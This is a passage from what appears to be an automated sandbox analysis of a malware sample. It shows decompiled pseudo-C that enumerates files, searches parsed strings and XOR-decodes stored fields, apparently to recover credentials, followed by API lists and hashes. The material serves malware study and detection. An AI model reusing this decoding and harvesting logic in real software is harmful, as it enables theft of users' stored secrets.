    						E0041B667( &_v612);
    						goto L31;
    					}
    					_v640 = E00416378(0x622);
    					E0040F9FD(0x91,  &_v588);
    					E0040F9FD(0x92,  &_v628);
    					E0040F9FD(0x93,  &_v620);
    					E0040F9FD(0x94,  &_v576);
    					__eflags = _v640;
    					if(_v640 == 0) {
    						L29:
    						E004163A8(_v640);
    						E004163C4(_v652, _v656);
    						goto L30;
    					}
    					_v644 = 0;
    					__eflags = _v648;
    					if(_v648 > 0) {
    						do {
    							_t166 = _v644;
    							_t101 = _v652;
    							__eflags =  *(_t101 + _t166 * 4);
    							if( *(_t101 + _t166 * 4) == 0) {
    								goto L28;
    							}
    							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
    							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
    							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
    							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
    							__eflags = _v676;
    							_t167 = _t112;
    							if(_v676 == 0) {
    								goto L28;
    							}
    							__eflags = _v672;
    							if(_v672 == 0) {
    								goto L28;
    							}
    							__eflags = _t167;
    							if(_t167 == 0) {
    								goto L28;
    							}
    							_v676 =  &(_v676[8]);
    							_v672 =  &(_v672[6]);
    							_t168 =  &(_t167[0xa]);
    							_v652 = _t168;
    							E0040C045();
    							E0040C045();
    							E0040C045();
    							__eflags = _t156;
    							if(_t156 == 0) {
    								L15:
    								_t157 = 0x15;
    								L16:
    								__eflags =  *_v676;
    								if( *_v676 == 0) {
    									goto L28;
    								}
    								__eflags =  *_v672;
    								if( *_v672 == 0) {
    									goto L28;
    								}
    								_t121 =  *_t168;
    								__eflags = _t121;
    								if(_t121 == 0) {
    									goto L28;
    								}
    								__eflags = _t121 - 0x30;
    								if(_t121 == 0x30) {
    									L21:
    									__eflags = _t168[0];
    									if(_t168[0] == 0) {
    										goto L28;
    									}
    									L22:
    									_t122 = 0;
    									__eflags =  *_t168;
    									if( *_t168 == 0) {
    										goto L28;
    									} else {
    										goto L23;
    									}
    									do {
    										L23:
    										_t122[_t168] = _t122[_t168] ^ 0x00000019;
    										_t122 =  &(_t122[1]);
    										__eflags = _t122[_t168];
    									} while (_t122[_t168] != 0);
    									__eflags = _t122;
    									if(_t122 > 0) {
    										_t169 =  &_v580;
    										_t123 = 0x57;
    										E0040FA33(_t123,  &_v580);
    										_push(_t157);
    										_push(_v676);
    										_t158 = _v656;
    										_push(_v652);
    										_push(_v672);
    										_t126 = E0041709B(_t169, 0x311, _v656, _t169);
    										_t174 = _t174 + 0x14;
    										__eflags = _t126;
    										if(_t126 > 0) {
    											_t170 = _a4;
    											_t127 = E0041679C(_t126, _t170, _t158);
    											__eflags = _t127;
    											if(_t127 != 0) {
    												_t68 = _t170 + 4;
    												 *_t68 =  &(( *(_t170 + 4))[1]);
    												__eflags =  *_t68;
    											}
    										}
    									}
    									goto L28;
    								}
    								__eflags = _t121 - 0x31;
    								if(_t121 != 0x31) {
    									goto L22;
    								}
    								goto L21;
    							}
    							_v648 =  &(_t156[6]);
    							E0040C045();
    							_t157 = E00416A27(_v648,  &_v588, 0);
    							__eflags = _t157 - 1;
    							if(_t157 < 1) {
    								goto L15;
    							}
    							__eflags = _t157 - 0xffff;
    							if(_t157 <= 0xffff) {
    								goto L16;
    							}
    							goto L15;
    							L28:
    							_v644 = _v644 + 1;
    							__eflags = _v644 - _v648;
    						} while (_v644 < _v648);
    					}
    					goto L29;
    				} else {
    					_t171 =  &_v612;
    					E0040FA33(0x90, _t171);
    					_v648 = _t171;
    					E0041BAD3( &_v524,  &_v648, _t177, 1, 5, E0040C05F, _a4, 0, 0, 0);
    					goto L31;
    				}
    			}

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040C185
    • StrStrIA.SHLWAPI(?,?), ref: 0040C197
    • StrStrIA.SHLWAPI(?,?), ref: 0040C1A7
    • StrStrIA.SHLWAPI(?,?), ref: 0040C1B9
      • Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
      • Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
      • Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
      • Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
      • Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
      • Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
    • String ID:
    • API String ID: 1075381090-0
    • Opcode ID: 0894d953aed1439b375bcf8e731a29ac493e6ec3c19bb1beb190edcef6f7ca5f
    • Instruction ID: 9ca36659a7b4aa9e63bf3244a43c0fae426a4e28d2255d1cb66667faa08e50ff
    • Opcode Fuzzy Hash: 0894d953aed1439b375bcf8e731a29ac493e6ec3c19bb1beb190edcef6f7ca5f
    • Instruction Fuzzy Hash: 01715C71908341DFC720DF65C881A9FB7E5AF85704F010A6FF484A7292D738D94ACB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405BC3(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t13;
    				signed int _t19;
    				signed short _t26;
    				signed int _t30;
    				void* _t37;
    
    				_t37 = E00416EF7(_a4);
    				if(_t37 > 0x3e8) {
    					EnterCriticalSection(0x4228a8);
    					E004163A8( *0x42289c);
    					 *0x42289c =  *0x42289c & 0x00000000;
    					 *0x4228a4 = 0;
    					LeaveCriticalSection(0x4228a8);
    					return 0;
    				}
    				EnterCriticalSection(0x4228a8);
    				_t26 = ( *0x4228a4 & 0x0000ffff) + _t37;
    				if(_t26 <= 0x3e8) {
    					_t13 = E00416333(_t26 + _t26, 0x42289c);
    					if(_t13 != 0) {
    						_t30 =  *0x42289c; // 0x0
    						_t13 = E004163E4(_t30 + ( *0x4228a4 & 0x0000ffff) * 2, _a4, _t37 + _t37);
    						 *0x4228a4 = _t26;
    					}
    				} else {
    					_t13 = E00416333(0x7d0, 0x42289c);
    					if(_t13 != 0) {
    						_t18 = 0x3e8 - _t37;
    						_t19 =  *0x42289c; // 0x0
    						E004163E4(_t19, _t19 + (( *0x4228a4 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
    						_t13 = E004163E4(0x3e8 - _t37 + _t18 +  *0x42289c, _v8, _t37 + _t37);
    						 *0x4228a4 = 0x3e8;
    					}
    				}
    				LeaveCriticalSection(0x4228a8);
    				return _t13;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405BE0
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • LeaveCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405C01
    • EnterCriticalSection.KERNEL32(004228A8,?,?,?,?,00405EB6,?), ref: 00405C12
    • LeaveCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405CAB
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$FreeHeap
    • String ID:
    • API String ID: 1946732658-0
    • Opcode ID: 8c98e4a713bcc47e4ee27700e85d97a9b3e065b4b3e52fba621c802cef5d1789
    • Instruction ID: 654a3610b4436ea773b8b84e127ad4b63ff87736c8aca31fc9044148c575746a
    • Opcode Fuzzy Hash: 8c98e4a713bcc47e4ee27700e85d97a9b3e065b4b3e52fba621c802cef5d1789
    • Instruction Fuzzy Hash: 6B21C431604214BBDB10AF68EE8497A37A8EF84304744423FF901962B1DB79D842CB6D
    Uniqueness

    Uniqueness Score: -1.00%